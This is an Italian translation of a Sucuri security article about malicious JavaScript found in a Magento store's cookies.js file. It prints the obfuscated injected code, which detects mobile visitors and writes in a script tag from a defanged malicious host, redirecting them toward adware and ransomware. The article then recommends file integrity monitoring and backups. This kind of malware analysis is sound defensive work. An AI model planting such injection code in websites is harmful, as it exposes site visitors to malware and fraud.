Traduzione autorizzata da Sucuri che detiene il copyright dell’articolo. Leggi l’articolo originale (in Inglese)
Un malware mobile è un software dannoso che mira a telefoni cellulari / smartphone, tablet e dispositivi simili. Gli attacchi possono variare da danneggiamenti fatali all’OS (cd. bricking) alla perdita di informazioni sensibili e personali, come carte di credito, password salvate, immagini e molto altro ancora.
Hai problemi di malware nel tuo ecommerce?
chiama 339 848 3250
Con la costante crescita degli utenti mobili, gli attaccanti stanno concentrando i loro sforzi sullo sviluppo di malware mirati a questi dispositivi. In questo articolo descriveremo come Sucuri abbia rilevato un attacco interessante contro una piattaforma di ecommerce.
Durante una ricerca sull’incidente, Sucuri ha identificato un codice dannoso in un’installazione di Magento che si trova nel file “./js/mage/cookies.js”. Ecco parte dello snippet:
var _$_f51c = [“userAgent”, “vendor”, “opera”, “test”, “substr”, “<script type=\”text/javascript\” src=\”hxxp://Malicious-URL-REMOVED.com/odessa/?md2\”></script>”, “write”];
function isMobile() {
var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);
if (/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || )) {
return true
};
return false
}
if (isMobile() === true) {
document[_$_f51c[6]](_$_f51c[5])
}
La funzione isMobile () controlla se il visitatore utilizza uno degli elenchi predefiniti di smartphone / tablet e se corrisponde, l’utente verrà reindirizzato ad altri siti maligni.
Questi altri siti web richiederanno l’installazione di software di terze parti che richiedono di pulire o velocizzare dispositivi mobili, barre degli strumenti, adware o addirittura peggio, URL dannosi che distribuiscono ransomware che bloccheranno il dispositivo e lo faranno ostaggio fino a quando verrà pagato un importo X di denaro all’attaccante via bitcoin.
A seconda della campagna dell’attaccante, possono anche reindirizzare i visitatori o i potenziali acquirenti ai siti web concorrenti, causando così un enorme impatto sui redditi del proprietario del sito. Tieni presente che questi attacchi non sono limitati ai siti Web di Magento, perché potrebbero essere destinati a WordPress, Joomla, OpenCart, Prestashop e altre piattaforme diverse.
Per individuare e prevenire queste problematiche, ti consigliamo di installare un sistema di monitoraggio dell’integrità dei file e di avere dei backup dei file / database a disposizione. Se il tuo ambiente è compromesso, sarai in grado di identificare e tempestivamente ripristinare i file per evitare ulteriori danni alla tua presenza online e SEO.
Articolo di Moe Obaid, Sucuri
Lascia un commento